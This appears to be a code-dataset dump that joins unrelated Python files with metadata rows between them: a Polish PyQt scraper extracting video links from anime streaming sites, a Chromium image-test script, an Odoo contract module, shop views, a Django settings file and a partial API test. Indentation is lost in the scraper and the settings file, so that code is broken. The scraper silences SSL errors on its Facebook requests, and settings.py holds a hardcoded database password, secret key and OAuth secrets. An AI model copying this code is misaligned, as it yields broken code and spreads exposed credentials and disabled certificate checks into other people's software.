downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Serwer zwrócił niepoprawną zawartość...')
self.writeLog(str(qReply.readAll().data()))
else:
done = 0
data = str(qReply.readAll().data())
data = data[data.find('video_tabs'):]
data = data[:data.find('<script')]
fb_count = int(data.count('http://anime-shinden.info/player/hd.php') / 2)
sibnet_count = data.count('video.sibnet.ru')
daily_count = data.count('www.dailymotion.com/embed/video')
if daily_count == 0:
daily_count = int(data.count('www.dailymotion.com/swf/video/') / 2)
data_backup = data
'''#jwplayer - fb'''
if fb_count > 0:
done = 1
fb_table = [None]
for i in range(0, fb_count):
data = data[data.find('http://anime-shinden.info/player/hd.php') + 10:]
data = data[data.find('http://anime-shinden.info/player/hd.php'):]
data = data[data.find('link=') + 5:]
vid = data[:data.find('.mp4')]
vid = 'https://www.facebook.com/video/embed?video_id=' + vid
link_to_face = self.getEmbedFacebookVideoLink(vid)
if len(link_to_face) > 0:
ep = EPISODE()
if fb_count == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_face)
fb_table.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_face)
fb_table.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do fejsa...')
done = 0
if done == 1:
ret_val = fb_table
if (done == 0) and (sibnet_count > 0):
data = data_backup
done = 1
sib_table = [None]
for i in range(0, sibnet_count):
data = data[data.find('http://video.sibnet.ru/'):]
data = data[data.find('=') + 1:]
vid = data[:data.find('''"''')]
link_to_sib = self.getEmbedSibnetRUVideoLink(vid)
if len(link_to_sib) > 0:
ep = EPISODE()
                            if sibnet_count == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_sib)
sib_table.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_sib)
                                sib_table.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do Sibnetu...')
done = 0
if done == 1:
ret_val = sib_table
print('Sibnet :D')
if (done == 0) and (daily_count > 0):
print('Daily lol')
data = data_backup
data = data.replace('http://www.dailymotion.com/swf/video/', 'http://www.dailymotion.com/embed/video/')
done = 1
daily_table = [None]
for i in range(0, daily_count):
data = data[data.find('http://www.dailymotion.com/embed/video/'):]
daily_temple_link = data[:data.find('''"''')]
data = data[data.find('''"'''):]
link_to_daily = self.getEmbedDailyVideoLink(daily_temple_link)
if len(link_to_daily) > 0:
ep = EPISODE()
if daily_count == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_daily)
daily_table.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_daily)
daily_table.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do DailyMotion...')
done = 0
if done == 1:
ret_val = daily_table
if done == 0:
self.writeLog('Wybacz, nie udało mi się znaleźć linku do żadnego działającego serwisu :(')
return ret_val
def extractLinksFromAnimeOn(self, link, basename):
ret_val = [None]
self.writeLog('Pobieranie i parsowanie strony ' + basename + '...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(link)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Serwer zwrócił niepoprawną zawartość...')
else:
data = str(qReply.readAll().data())
data = data[data.find('float-left player-container'):]
data = data[:data.find('float-left episode-nav')]
if data.count('<iframe src=') > 0:
counter = data.count('<iframe src=')
for i in range(0, data.count('<iframe src=')):
data = data[data.find('<iframe src='):]
data = data[data.find("""'""") + 1:]
the_link = data[:data.find("\\")]
data = data[data.find('</iframe>'):]
if the_link.find('facebook.com') > 0:
link_to_face = self.getEmbedFacebookVideoLink(the_link)
if len(link_to_face) > 0:
'''link_to_face = download'''
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_face)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_face)
ret_val.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do fejsa...')
elif the_link.find('vk.com') > 0:
link_to_vk = self.getEmbedVKVideoLink(the_link)
if len(link_to_vk) > 0:
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_vk)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_vk)
ret_val.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do VK...')
else:
self.writeLog('I dont know this player...')
elif data.count('<embed src=') > 0:
counter = data.count('<embed src=')
for i in range(0, data.count('<embed src=')):
data = data[data.find('<embed src='):]
data = data[data.find("""'""") + 1:]
the_link = data[:data.find("\\")]
data = data[data.find('</embed>'):]
if the_link.find('video.sibnet.ru') > 0:
the_link = the_link[the_link.find('=') + 1:]
link_to_sibnet = self.getEmbedSibnetRUVideoLink(the_link)
if len(link_to_sibnet) > 0:
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_sibnet)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_sibnet)
ret_val.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do Sibnetu...')
else:
self.writeLog('I dont know this player...')
elif data.count('jwplayer(') > 0:
counter = data.count('jwplayer(')
for i in range(0, counter):
data = data[data.find('jwplayer('):]
data = data[data.find('http://'):]
jw_link = data[:data.find("""'""") - 1]
qReply = qNetMgr.get(QNetworkRequest(QUrl(jw_link)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if not ((qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200) or (qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302)):
jw_link = ''
if len(jw_link) > 0:
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(jw_link)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(jw_link)
ret_val.append(ep)
else:
self.writeLog('No player found.')
return ret_val
def getEmbedDailyVideoLink(self, url):
ret_val = ''
if url.count('/swf/') > 0:
url = url.replace('/swf/', '/embed/')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
            print(qReply.size())
data = qReply.readAll().data().decode('UTF-8')
if data.count('''"stream_h264_hd_url"''') > 0:
data = data[data.find('''"stream_h264_hd_url"'''):]
data = data[data.find('http:'):]
data = data[:data.find('''"''')]
data = data.replace("\\", '')
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302:
'''302 Found'''
ret_val = data
return ret_val
def getEmbedSibnetRUVideoLink(self, vid):
ret_val = ''
url = 'http://video.sibnet.ru/shell_config_xml.php?videoid=' + vid + '&type=video.sibnet.ru'
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
data = qReply.readAll().data().decode('UTF-8')
data = data[data.find('<file>') + 6:data.find('</file>')]
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302:
'''302 Found'''
ret_val = data
return ret_val
def getEmbedVKVideoLink(self, url):
ret_val = ''
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
data = qReply.readAll().data().decode('windows-1251')
data = data[data.find('url720=') + 7:]
data = data[:data.find('&')]
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200:
'''200 OK'''
ret_val = data
return ret_val
def getEmbedFacebookVideoLink(self, url):
ret_val = ''
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
qReply.sslErrors.connect(qReply.ignoreSslErrors)
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
data = qReply.readAll().data().decode('UTF-8')
if data.count('hd_src') > 0:
data = data[data.find('hd_src'):]
data = data[data.find('https'):]
data = data[:data.find('u002522') - 1]
data = data.replace("\\", "/")
data = data.replace("/u00255C", "").replace("/u00252F", "/").replace("/u00253F", "?").replace("/u00253D", "=").replace("/u002526", "&").replace("/u00253A",":")
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.sslErrors.connect(qReply.ignoreSslErrors)
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200:
'''200 OK'''
ret_val = data
return ret_val
def getAShindenList(self, url, items):
series_name = "-"
self.writeLog('Trwa pobieranie listy odcinków serii(A-Shinden)...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
loop = QEventLoop()
qReply.finished.connect(loop.quit)
loop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Pobieranie danych o liście odcników nie powiodło się!')
else:
self.writeLog('Pobrano dane. Trwa parsowanie danych...')
data = str(qReply.readAll().data())
series_name = data[data.find('base fullstory'):]
series_name = series_name[:series_name.find('</a>')]
series_name = series_name[series_name.find('>', series_name.find('<a href=') + 7) + 1:]
series_name = series_name[:series_name.find('(') - 1]
self.writeLog('Pobierana seria: ' + series_name)
'''Extract episode list'''
'''Shrink data'''
data = data[data.find('daj online'):]
data = data[:data.find('</table>')]
data = data[data.find('<a href='):]
data = data[:data.find('</td>')]
i = data.find('<a href=')
while i >= 0:
ep = EPISODE()
ep.setValue(data[i + 9:data.find("\"", i + 9)])
data = data[data.find('>') + 1:]
ep.setText(data[:data.find('</a>')])
if data.find('<a href') >= 0:
data = data[data.find('<a href'):]
i = data.find('<a href')
if (ep.text().lower().find('odcinek') >= 0) or (ep.text().lower().find('ova') >= 0) or (ep.text().lower().find('odc') >= 0):
items.addItem(ep)
self.writeLog('Lista odcinków pobrana.')
else:
self.writeLog('Błąd połączenia. Pobieranie danych o liście odcników nie powiodło się!')
return series_name
def getAnimeOnList(self, url, items):
series_name = "-"
self.writeLog('Trwa pobieranie listy odcinków serii(AnimeOn)...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
loop = QEventLoop()
qReply.finished.connect(loop.quit)
loop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Pobieranie danych o liście odcników nie powiodło się!')
else:
self.writeLog('Pobrano dane. Trwa parsowanie danych...')
data = str(qReply.readAll().data())
series_name = data[data.find('<title>') + 7: data.find(' Anime Online PL')]
data = data[data.find('episode-table') + 13:]
data = data[:data.find('</table')]
i = data.find('http://')
while i >= 0:
ep = EPISODE()
data = data[data.find('http://'):]
ep.setValue(data[:data.find('\\')])
ep.setText(data[data.find('odcinek'):data.find('</a>')])
items.addItem(ep)
data = data[data.find('</a>'):]
i = data.find('http://')
else:
self.writeLog('Błąd połączenia. Pobieranie danych o liście odcników nie powiodło się!')
return series_name
|
gpl-3.0
| -7,560,106,690,500,875,000
| 44.687063
| 175
| 0.488578
| false
| 3.980655
| false
| false
| false
|
endlessm/chromium-browser
|
third_party/chromite/scripts/test_image.py
|
1
|
4062
|
# -*- coding: utf-8 -*-
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to mount a built image and run tests on it."""
from __future__ import print_function
import os
import sys
import unittest
from chromite.lib import constants
from chromite.lib import commandline
from chromite.lib import image_lib
from chromite.lib import image_test_lib
from chromite.lib import osutils
from chromite.lib import path_util
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
def ParseArgs(args):
"""Return parsed commandline arguments."""
parser = commandline.ArgumentParser(description=__doc__)
parser.add_argument('--test_results_root', type='path',
help='Directory to store test results')
parser.add_argument('--board', type=str, help='Board (wolf, beaglebone...)')
parser.add_argument('image', type='path',
help='Image directory (or file) with mount_image.sh and '
'umount_image.sh')
parser.add_argument('-l', '--list', default=False, action='store_true',
help='List all the available tests')
parser.add_argument('tests', nargs='*', metavar='test',
help='Specific tests to run (default runs all)')
opts = parser.parse_args(args)
opts.Freeze()
return opts
def FindImage(image_path):
"""Return the path to the image file.
Args:
image_path: A path to the image file, or a directory containing the base
image.
Returns:
    The absolute path to the image file.
"""
if os.path.isdir(image_path):
# Assume base image.
image_file = os.path.join(image_path, constants.BASE_IMAGE_NAME + '.bin')
if not os.path.exists(image_file):
raise ValueError('Cannot find base image %s' % image_file)
elif os.path.isfile(image_path):
image_file = image_path
else:
raise ValueError('%s is neither a directory nor a file' % image_path)
return image_file
def main(args):
opts = ParseArgs(args)
# Build up test suites.
loader = unittest.TestLoader()
loader.suiteClass = image_test_lib.ImageTestSuite
  # We use a different prefix here so that unittest does NOT pick up the
  # image tests automatically, because they depend on a proper environment.
loader.testMethodPrefix = 'Test'
tests_namespace = 'chromite.cros.test.image_test'
if opts.tests:
tests = ['%s.%s' % (tests_namespace, x) for x in opts.tests]
else:
tests = (tests_namespace,)
all_tests = loader.loadTestsFromNames(tests)
# If they just want to see the lists of tests, show them now.
if opts.list:
def _WalkSuite(suite):
for test in suite:
if isinstance(test, unittest.BaseTestSuite):
for result in _WalkSuite(test):
yield result
else:
yield (test.id()[len(tests_namespace) + 1:],
test.shortDescription() or '')
test_list = list(_WalkSuite(all_tests))
maxlen = max(len(x[0]) for x in test_list)
for name, desc in test_list:
print('%-*s %s' % (maxlen, name, desc))
return
# Run them in the image directory.
runner = image_test_lib.ImageTestRunner()
runner.SetBoard(opts.board)
runner.SetResultDir(opts.test_results_root)
image_file = FindImage(opts.image)
tmp_in_chroot = path_util.FromChrootPath('/tmp')
with osutils.TempDir(base_dir=tmp_in_chroot) as temp_dir:
with image_lib.LoopbackPartitions(image_file, temp_dir) as image:
# Due to the lack of mount context, we mount the partitions
# but do not reference directly. This will be removed with the
# submission of http://crrev/c/1795578
_ = image.Mount((constants.PART_ROOT_A,))[0]
_ = image.Mount((constants.PART_STATE,))[0]
with osutils.ChdirContext(temp_dir):
result = runner.run(all_tests)
if result and not result.wasSuccessful():
return 1
return 0
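# Hedged example invocations (board and paths are illustrative; the script is
# normally run inside the Chrome OS chroot, where chromite wraps it):
#   test_image --board=wolf --list /path/to/image_dir
#   test_image --board=wolf --test_results_root=/tmp/results \
#       /path/to/chromiumos_base_image.bin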
|
bsd-3-clause
| -3,099,706,782,971,267,600
| 32.295082
| 79
| 0.670852
| false
| 3.754159
| true
| false
| false
|
OCA/contract
|
contract_variable_quantity/models/contract_line.py
|
1
|
2127
|
# Copyright 2016 Tecnativa - Pedro M. Baeza
# Copyright 2018 Tecnativa - Carlos Dauden
# Copyright 2018 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import api, models
from odoo.tools import float_is_zero
from odoo.tools.safe_eval import safe_eval
class AccountAnalyticInvoiceLine(models.Model):
_inherit = 'contract.line'
@api.multi
def _get_quantity_to_invoice(
self, period_first_date, period_last_date, invoice_date
):
quantity = super(
AccountAnalyticInvoiceLine, self
)._get_quantity_to_invoice(
period_first_date, period_last_date, invoice_date
)
if not period_first_date or not period_last_date or not invoice_date:
return quantity
if self.qty_type == 'variable':
eval_context = {
'env': self.env,
'context': self.env.context,
'user': self.env.user,
'line': self,
'quantity': quantity,
'period_first_date': period_first_date,
'period_last_date': period_last_date,
'invoice_date': invoice_date,
'contract': self.contract_id,
}
safe_eval(
self.qty_formula_id.code.strip(),
eval_context,
mode="exec",
nocopy=True,
) # nocopy for returning result
quantity = eval_context.get('result', 0)
return quantity
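    # Hedged example of a variable-quantity formula (the snippet stored in
    # qty_formula_id.code). It is executed with safe_eval against the
    # eval_context built above and must leave its output in `result`, e.g.:
    #
    #     result = quantity * (period_last_date - period_first_date).days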
@api.multi
def _prepare_invoice_line(self, invoice_id=False, invoice_values=False):
vals = super(AccountAnalyticInvoiceLine, self)._prepare_invoice_line(
invoice_id=invoice_id, invoice_values=invoice_values,
)
if (
'quantity' in vals
and self.contract_id.skip_zero_qty
and float_is_zero(
vals['quantity'],
self.env['decimal.precision'].precision_get(
'Product Unit of Measure'
),
)
):
vals = {}
return vals
|
agpl-3.0
| 1,996,008,599,080,476,700
| 33.306452
| 77
| 0.5496
| false
| 4.05916
| false
| false
| false
|
fusionbox/satchless
|
examples/demo/core/views.py
|
1
|
1250
|
# -*- coding:utf-8 -*-
from django.contrib import messages
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from django.utils.translation import ugettext_lazy as _
from satchless.order.app import order_app
def home_page(request):
messages.success(request, _(u'<strong>Welcome!</strong> This is a demo shop built on Satchless. Enjoy!'))
return TemplateResponse(request, 'core/home_page.html')
def thank_you_page(request, order_token):
order = order_app.get_order(request, order_token)
    if order.status not in ('payment-failed', 'payment-complete', 'delivery'):
return redirect(order_app.reverse('satchless-order-view',
args=(order.token,)))
if order.status == 'payment-failed':
return redirect('payment-failed', order_token=order.token)
return TemplateResponse(request, 'satchless/checkout/thank_you.html', {
'order': order,
})
def payment_failed(request, order_token):
order = order_app.get_order(request, order_token)
if order.status != 'payment-failed':
return redirect(order)
return TemplateResponse(request, 'satchless/checkout/payment_failed.html', {
'order': order,
})
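# Hedged wiring sketch (URL names follow the redirects above; the demo's real
# urls.py may differ):
#
#     from django.conf.urls import patterns, url
#     urlpatterns = patterns('core.views',
#         url(r'^$', 'home_page', name='home'),
#         url(r'^thank-you/(?P<order_token>\w+)/$', 'thank_you_page',
#             name='thank-you-page'),
#         url(r'^payment-failed/(?P<order_token>\w+)/$', 'payment_failed',
#             name='payment-failed'),
#     )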
|
bsd-3-clause
| -7,441,253,123,787,888,000
| 36.878788
| 109
| 0.6872
| false
| 3.869969
| false
| false
| false
|
Robbie1977/AlignmentPipe
|
align/settings.py
|
1
|
10620
|
import psycopg2, os
# import subprocess
from socket import gethostname
host = gethostname()
con = psycopg2.connect(host='bocian.inf.ed.ac.uk', database='alignment', user='aligner_admin', password='default99')
cur = con.cursor()
cur.execute("SELECT upload_dir FROM system_server WHERE host_name like '" + host + "'")
record = cur.fetchone()
if record is None:
print 'Missing server settings for ' + str(host)
cur.execute("SELECT upload_dir, host_name FROM system_server")
record = cur.fetchone()
print 'Having to use settings for ' + str(record[1])
host = str(record[1])
uploadfolder = str(record[0])
cur.close()
con.close()
del cur, con, record
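# Hedged note: the bootstrap above expects a row in system_server such as
#     INSERT INTO system_server (host_name, upload_dir)
#     VALUES ('myhost.example.org', '/disk/data/VFB/aligner/uploads/');
# (column names taken from the queries above; the real table may have more).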
# Use to reset file permission only if error occurs
# for file in os.listdir(uploadfolder):
# try:
# # os.chmod(uploadfolder + file, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
# subprocess.call(['chmod', '0777', uploadfolder + file])
# print 'OK: ' + file
# except:
# print 'Error: ' + file
#
# Django settings for align project.
# DEBUG = True
# TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Robert Court', 'r.court@ed.ac.uk'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'django_mongodb_engine'.
'NAME': 'alignment', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'aligner_admin',
'PASSWORD': 'default99',
'HOST': 'bocian.inf.ed.ac.uk', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['localhost', '127.0.0.1', 'bocian.inf.ed.ac.uk', 'vfbaligner.inf.ed.ac.uk']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
# SITE_ID=u'5395bb746c132991c57933f6'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = '/disk/data/VFB/aligner/uploads/'
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = '/disk/data/VFB/aligner/static/'
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'dv16bwh3f1x%p9csb3o7l9k#o8d_oqp-)aa=afq%yj+2$s96_('
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
LOGIN_URL = '/'
LOGIN_REDIRECT_URL = '/'
LOGIN_ERROR_URL = '/'
SOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'
SOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_associate_complete'
SOCIAL_AUTH_GITHUB_KEY = 'e8bfae9142f86f36b391'
SOCIAL_AUTH_GITHUB_SECRET = 'b7617cf006cace2e60d90f089816924e0eabbd0f'
SOCIAL_AUTH_GITHUB_SCOPE = ['user:email']
# SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = '884257168498-3gec80pdfpullsaeavbg2nqra3aflru5.apps.googleusercontent.com'
# SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = 'pvsqhFUx1kmBiGlVWERy_Q-b'
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ.get(
'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY',
'884257168498-3gec80pdfpullsaeavbg2nqra3aflru5.apps.googleusercontent.com'
)
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ.get(
'SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET',
'pvsqhFUx1kmBiGlVWERy_Q-b'
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'social.apps.django_app.context_processors.backends',
'social.apps.django_app.context_processors.login_redirect',
)
# MIDDLEWARE_CLASSES = (
# 'django.middleware.common.CommonMiddleware',
# 'django.contrib.sessions.middleware.SessionMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'social.apps.django_app.middleware.SocialAuthExceptionMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# # 'permission_backend_nonrel.backends.NonrelPermissionBackend'
# 'django.contrib.messages.middleware.MessageMiddleware',
# # Uncomment the next line for simple clickjacking protection:
# # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
# )
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'social.apps.django_app.middleware.SocialAuthExceptionMiddleware',
)
ROOT_URLCONF = 'urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'align.wsgi.application'
TEMPLATE_DIRS = (
"/disk/data/VFB/aligner/AlignmentPipe/align/images/templates/admin_copies" ,
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# AUTHENTICATION_BACKENDS = (
# 'permission_backend_nonrel.backends.NonrelPermissionBackend',
# )
# AUTHENTICATION_BACKENDS = (
# 'social.backends.google.GoogleOAuth2',
# 'social.backends.google.GooglePlusAuth',
# 'django.contrib.auth.backends.ModelBackend',
# )
# AUTHENTICATION_BACKENDS = (
# 'social.backends.open_id.OpenIdAuth',
# 'social.backends.google.GoogleOpenId',
# 'social.backends.google.GoogleOAuth2',
# 'social.backends.google.GoogleOAuth',
# 'social.backends.twitter.TwitterOAuth',
# 'social.backends.yahoo.YahooOpenId',
# 'django.contrib.auth.backends.ModelBackend',
# )
AUTHENTICATION_BACKENDS = (
# 'social.backends.facebook.FacebookOAuth2',
'social.backends.google.GoogleOAuth2',
'social.backends.google.GooglePlusAuth',
# 'social.backends.twitter.TwitterOAuth',
'django.contrib.auth.backends.ModelBackend',
'social.backends.github.GithubOAuth2',
# 'social_auth.backends.contrib.linkedin.LinkedinBackend',
)
# SOCIAL_AUTH_USER_MODEL = 'users.User'
SOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = ['username', 'first_name', 'email']
LOGIN_REDIRECT_URL = '/'
SOCIAL_AUTH_AUTHENTICATION_BACKENDS = (
'social.backends.open_id.OpenIdAuth',
'social.backends.google.GoogleOpenId',
'social.backends.google.GoogleOAuth2',
'social.backends.google.GoogleOAuth',
'social.backends.google.GooglePlusAuth',
# 'social.backends.twitter.TwitterOAuth',
# 'social.backends.yahoo.YahooOpenId',
'social.backends.github.GithubOAuth2',
# 'social_auth.backends.contrib.linkedin.LinkedinBackend',
)
INSTALLED_APPS = (
'adminactions',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'django_mongodb_engine',
'django.db.backends.postgresql_psycopg2',
# 'djangotoolbox',
# 'permission_backend_nonrel',
'system',
'images',
'users',
'bootstrap3',
'images.templatetags.images_extras',
'users.templatetags.backend_utils',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
'django.contrib.admindocs',
'social.apps.django_app.default',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
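# Commented-out sketch of adding a console handler for local debugging
# (illustrative only; the handler name is an assumption):
# LOGGING['handlers']['console'] = {
#     'level': 'DEBUG',
#     'class': 'logging.StreamHandler',
# }
# LOGGING['loggers']['django.request']['handlers'].append('console')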
|
mit
| -6,374,926,531,072,543,000
| 34.165563
| 146
| 0.706874
| false
| 3.366086
| false
| false
| false
|
apel/rest
|
api/tests/test_cloud_record_summary_get.py
|
1
|
9827
|
"""This module tests GET requests to the Cloud Sumamry Record endpoint."""
import logging
import MySQLdb
from api.utils.TokenChecker import TokenChecker
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
from mock import patch
QPATH_TEST = '/tmp/django-test/'
class CloudRecordSummaryGetTest(TestCase):
"""Tests GET requests to the Cloud Sumamry Record endpoint."""
def setUp(self):
"""Prevent logging from appearing in test output."""
logging.disable(logging.CRITICAL)
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_IAM_fail(self, mock_valid_token_to_id):
"""
Test what happens if we fail to contact the IAM.
i.e, _token_to_id returns None
IAM = Identity and Access Management
"""
# Mock the functionality of the IAM
# Used in the underlying GET method
# Simulates a failure to translate a token to an ID
mock_valid_token_to_id.return_value = None
with self.settings(ALLOWED_FOR_GET='TestService'):
# Make (and check) the GET request
self._check_summary_get(401,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="Bearer TestToken")
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_400(self, mock_valid_token_to_id):
"""Test a GET request without the from field."""
